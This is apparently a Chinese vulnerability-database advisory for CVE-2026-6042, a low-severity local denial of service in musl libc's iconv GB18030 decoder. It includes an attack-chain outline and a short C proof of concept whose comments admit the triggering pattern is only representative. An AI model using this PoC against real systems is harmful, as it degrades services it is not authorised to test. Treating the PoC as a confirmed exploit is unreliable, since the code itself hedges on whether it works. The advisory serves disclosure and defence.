CVE-2026-6042 CVSS 3.3 低危

CVE-2026-6042 musl libc iconv算法效率低下漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6042

漏洞类型

拒绝服务

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

musl libc

漏洞概述

musl libc 1.2.6及之前版本的iconv组件中存在安全漏洞。该漏洞源于GB18030 4字节解码器的算法效率低下。本地低权限攻击者可利用此问题通过特定输入触发低效算法，导致系统资源耗尽并引发拒绝服务，建议用户尽快升级或部署补丁修复。

技术细节

该漏洞位于musl libc库的src/locale/iconv.c文件中的iconv函数，核心问题出在GB18030字符集的4字节解码逻辑实现上。由于解码器在处理特定字节序列时未能有效控制算法复杂度，导致处理时间与输入数据长度呈非线性关系。攻击者可利用此缺陷，构造包含特殊GB18030编码序列的恶意输入数据。当本地应用程序调用iconv进行字符转换时，会触发低效算法，导致CPU资源被长时间占用。这种本地拒绝服务攻击会显著降低系统性能，甚至导致服务完全不可用。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用的是musl libc 1.2.6或更早版本，且系统中存在调用iconv进行GB18030转换的应用。

STEP 2

交付

攻击者在目标系统上获得低权限访问（如普通用户权限），并上传或编写包含恶意GB18030编码序列的测试程序。

STEP 3

利用

执行该程序，调用iconv函数将恶意数据转换为其他编码（如UTF-8），触发GB18030解码器中的算法效率低下问题。

STEP 4

影响

解码过程消耗大量CPU时间或内存，导致系统负载飙升，服务响应变慢或完全停止，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <iconv.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// PoC for CVE-2026-6042: musl libc iconv GB18030 inefficiency
// This code demonstrates the trigger point for the algorithmic complexity issue.

int main() {
    iconv_t cd = iconv_open("UTF-8", "GB18030");
    if (cd == (iconv_t)-1) {
        perror("iconv_open failed");
        return 1;
    }

    // Construct a payload designed to trigger the inefficient decoding path
    // The specific sequence depends on the flaw in the 4-byte decoder.
    // Below is a representative pattern of GB18030 4-byte sequences.
    char input[1024];
    memset(input, 0, sizeof(input));
    
    // Filling with a repetitive pattern that stresses the decoder
    for (int i = 0; i < 256; i++) {
        input[i*4] = 0x81; 
        input[i*4+1] = 0x30; 
        input[i*4+2] = 0x81; 
        input[i*4+3] = 0x30;
    }

    char outbuf[1024];
    char *inptr = input;
    char *outptr = outbuf;
    size_t inbytes = sizeof(input);
    size_t outbytes = sizeof(outbuf);

    printf("Starting conversion to trigger potential DoS...\n");
    size_t result = iconv(cd, &inptr, &inbytes, &outptr, &outbytes);
    
    if (result == (size_t)-1) {
        perror("iconv failed");
    } else {
        printf("Conversion finished.\n");
    }

    iconv_close(cd);
    return 0;
}

影响范围

musl libc <= 1.2.6

防御指南

临时缓解措施

在未完成升级前，建议监控系统中iconv相关进程的资源使用情况，并限制处理来源不明或用户提供的GB18030编码数据。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6042
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6042
3 Details https://www.cvedetails.com/cve/CVE-2026-6042/
4 VulDB https://vuldb.com/cve/CVE-2026-6042
5 Link https://vuldb.com/submit/796352
6 Link https://vuldb.com/vuln/356620
7 Link https://vuldb.com/vuln/356620/cti
8 Link https://www.openwall.com/lists/oss-security/2026/04/02/10
9 Link https://www.openwall.com/lists/oss-security/2026/04/03/2
10 Link http://www.openwall.com/lists/oss-security/2026/04/09/19

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表